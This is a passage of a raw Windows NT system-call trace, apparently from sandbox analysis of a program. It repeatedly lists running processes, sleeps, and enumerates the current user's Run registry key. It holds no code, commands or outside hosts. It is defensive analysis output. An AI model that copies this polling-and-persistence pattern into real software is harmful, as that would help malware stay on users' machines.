ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.281] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.292] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.292] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.293] NtClose (Handle=0x154) returned 0x0 [0188.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.293] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.297] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.309] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.309] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.309] NtClose (Handle=0x154) returned 0x0 [0188.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.310] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.315] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.325] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.325] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.325] NtClose (Handle=0x154) returned 0x0 [0188.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.329] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.339] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.339] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.339] NtClose (Handle=0x154) returned 0x0 [0188.339] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.340] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.340] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.343] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.344] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.355] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.355] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.356] NtClose (Handle=0x154) returned 0x0 [0188.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.364] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.370] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.370] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.370] NtClose (Handle=0x154) returned 0x0 [0188.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.374] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.387] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.387] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.387] NtClose (Handle=0x154) returned 0x0 [0188.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.392] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.401] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.402] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.402] NtClose (Handle=0x154) returned 0x0 [0188.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.406] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.419] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.420] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.420] NtClose (Handle=0x154) returned 0x0 [0188.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.424] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.433] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.433] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.433] NtClose (Handle=0x154) returned 0x0 [0188.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.436] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.450] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0188.478] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.478] NtClose (Handle=0x154) returned 0x0 [0188.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.482] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.495] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.495] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.495] NtClose (Handle=0xec) returned 0x0 [0188.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.497] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.500] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.511] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.511] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0188.511] NtClose (Handle=0xec) returned 0x0 [0188.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0188.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0188.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0188.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0188.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0188.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0188.515] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0188.527] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0xec) returned 0x0 [0188.527] NtEnumerateValueKey (in: KeyHandle=0xec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: 